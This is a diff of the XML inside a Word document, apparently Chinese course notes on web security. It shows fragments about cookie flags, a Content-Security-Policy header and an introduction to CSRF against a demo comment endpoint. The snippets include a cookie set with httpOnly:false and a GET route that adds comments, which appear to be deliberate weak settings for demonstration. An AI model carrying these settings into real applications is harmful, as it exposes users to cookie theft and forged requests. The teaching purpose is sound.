+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>set</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'userId'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>user</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>id</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>, {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>                </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>httpOnly:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>false</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>                </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>sameSite:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'strict'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
                 <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ctx.set(`Content-Security-Policy`, `default-src 'self'`);</w:t>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            });</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11397,192 +13254,16 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>inline-script脚本将不执行，只要同源才能够允许访问</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Refused to execute inline script because it violates the following Content Security Policy directive: "default-src 'self' </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://security-imooc.toobug.net\"." </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="12"/>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>http://security-imooc.toobug.net".</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>第04章 前端CSRF</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*Cross Site Request Forgy</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*跨站请求伪造</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="4"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>4.1 小试牛刀</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>登录后评论.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>打开other/csrf.html</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>发现评论多了一条来自CSRF的记录。</w:t>
-      </w:r>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:spacing w:before="53" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="1"/>
+        <w:ind w:leftChars="200"/>
+      </w:pPr>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -11617,10 +13298,6 @@
             <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
-          <w:tblCellMar>
-            <w:left w:w="108" w:type="dxa"/>
-            <w:right w:w="108" w:type="dxa"/>
-          </w:tblCellMar>
         </w:tblPrEx>
         <w:tc>
           <w:tcPr>
@@ -11628,185 +13305,1002 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>router.get('/ajax/addComment', site.addComment);</w:t>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>axios</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>post</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'/user/login'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>).</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>then</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>((</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>=&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>var data;</w:t>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>        </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="C586C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>if</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
